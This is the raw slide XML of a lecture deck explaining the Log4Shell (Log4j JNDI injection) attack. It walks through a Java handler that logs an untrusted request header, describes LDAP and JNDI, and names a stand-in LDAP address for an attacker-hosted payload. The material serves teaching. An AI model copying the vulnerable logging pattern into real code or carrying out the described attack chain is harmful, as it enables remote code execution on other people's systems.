              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:ea typeface="Söhne"/>
              </a:rPr>
              <a:t>: A Java annotation that tells the web application that this method should handle HTTP GET requests when the URL path is "/". In other words, when someone accesses the root URL of the application (e.g., </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" b="0" i="0" u="sng" strike="noStrike" cap="none" normalizeH="0" baseline="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Söhne"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://example.com/</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Söhne"/>
              </a:rPr>
              <a:t>), this method will be executed.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a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial Unicode MS"/>
                <a:ea typeface="Söhne Mono"/>
              </a:rPr>
              <a:t>public String index(@RequestHeader("X-Api-Version") String </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" err="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial Unicode MS"/>
                <a:ea typeface="Söhne Mono"/>
              </a:rPr>
              <a:t>apiVersion</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial Unicode MS"/>
                <a:ea typeface="Söhne Mono"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:ea typeface="Söhne"/>
              </a:rPr>
              <a:t>: This is a Java method that gets executed when a GET request is made to the root URL. It accepts a parameter named </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" err="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial Unicode MS"/>
                <a:ea typeface="Söhne Mono"/>
              </a:rPr>
              <a:t>apiVersion</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:ea typeface="Söhne"/>
              </a:rPr>
              <a:t>, which is obtained from an HTTP header called "X-Api-Version." In simple terms, it's looking for a specific piece of information (the API version) that the client has included in the HTTP request.</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="en-US" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="374151"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Söhne"/>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a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial Unicode MS"/>
                <a:ea typeface="Söhne Mono"/>
              </a:rPr>
              <a:t>logger.info("Received a request for API version " + </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" err="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial Unicode MS"/>
                <a:ea typeface="Söhne Mono"/>
              </a:rPr>
              <a:t>apiVersion</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial Unicode MS"/>
                <a:ea typeface="Söhne Mono"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:ea typeface="Söhne"/>
              </a:rPr>
              <a:t>: This line logs a message to some kind of logging system (Log4j). The message being logged is "Received a request for API version" followed by the value of </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" err="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial Unicode MS"/>
                <a:ea typeface="Söhne Mono"/>
              </a:rPr>
              <a:t>apiVersion</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:ea typeface="Söhne"/>
              </a:rPr>
              <a:t>. This helps developers keep track of what's happening in the application.</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="en-US" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="374151"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Söhne"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Picture 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9B3DF655-296B-8F88-9417-5125AA454FD7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="872678" y="675261"/>
            <a:ext cx="9184131" cy="1746926"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="242099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C5ADB7-9A3A-0395-DA8A-A41EEC423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52" y="528709"/>
            <a:ext cx="10675104" cy="5990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63AE9-6C52-6BFE-ED53-1A230E8766ED}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2757850" y="6518967"/>
            <a:ext cx="6174508" cy="276999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>https://blog.shiftleft.io/log4shell-jndi-injection-via-attackable-log4j-6bfea2b4896e</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{39655F92-8969-4AD1-1D40-8385A4542A2C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1341620" y="159377"/>
            <a:ext cx="6175946" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>A simple web application without Spring Framework (Pure Java) </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="+mj-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3415566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1901-E888-ECED-FA5E-B52C26AC518D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>2. Attackers need to develop a malicious payload </a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DA477A18-FA8C-BA8D-CDF9-8EB302252750}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>What is the malicious payload?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Where does a malicious payload store?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>How to access a malicious payload?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1608890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AD58-E6B9-FD7E-67D0-5376E76CEDF4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>What is the malicious payload?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{06499DF8-E5FE-7DC3-061E-B5600E692424}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>A piece of executable code or data that is intentionally designed to perform harmful actions when executed.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>A malicious payload is crafted by an attacker</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Example of malicious payload </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Scripting languages: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Python</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> script code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Commands: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> shell code, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Windows</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1">
                <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>cmd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>PowerShell</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Any code that instructs the computer to perform specific actions: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Java</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> class</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="132409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6A0-03BF-4D5F-8529-DF8AAAB6E007}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Where is a malicious payload stored?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1B053F55-BE90-DC80-CA1E-5339E65959B9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1825625"/>
            <a:ext cx="10515600" cy="4013701"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>When attackers need to invoke a malicious payload remotely, they typically employ various tactics to deliver and execute the payload on a target system over a network</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Email Attachments</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Drive-By Downloads</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Log4Jshell attack uses remote code execution</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Attackers use LDAP servers to host malicious code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Attackers will access and invoke the malicious payload stored on the LDAP server later</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DAB01823-D7F6-7945-7A1B-78960BF4AB0E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="10860710" y="100011"/>
            <a:ext cx="986180" cy="797519"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="370189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6A0-03BF-4D5F-8529-DF8AAAB6E007}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>What is LDAP?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1B053F55-BE90-DC80-CA1E-5339E65959B9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1825625"/>
            <a:ext cx="10515600" cy="4013701"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>LDAP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> (Lightweight Directory Access Protocol) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>a specific set of rules and methods to talk to a server (LDAP server)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>LDAP server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>A specialized type of server used for organizing and providing access to directory information</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Provide data management services: store data, search/retrieval, authenticate users</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DAB01823-D7F6-7945-7A1B-78960BF4AB0E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="10860710" y="100011"/>
            <a:ext cx="986180" cy="797519"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="337246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6A0-03BF-4D5F-8529-DF8AAAB6E007}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>How to access a malicious payload?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1B053F55-BE90-DC80-CA1E-5339E65959B9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1825625"/>
            <a:ext cx="10515600" cy="3219072"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>A malicious payload is a Java class</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ldap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB">
                <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>://example.com/malicious_payload</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>A malicious payload can be accessed by a client using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB">
                <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>JNDI</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB">
                <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>JNDI (Java Naming and Directory Interface) </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DD1604C6-748B-CF85-41FF-E1EC77E220A0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1909013" y="4337575"/>
            <a:ext cx="746825" cy="640135"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CAD296A4-CEDA-8B4A-CE48-9AC018E3D27A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7858122" y="4258882"/>
            <a:ext cx="986180" cy="797519"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
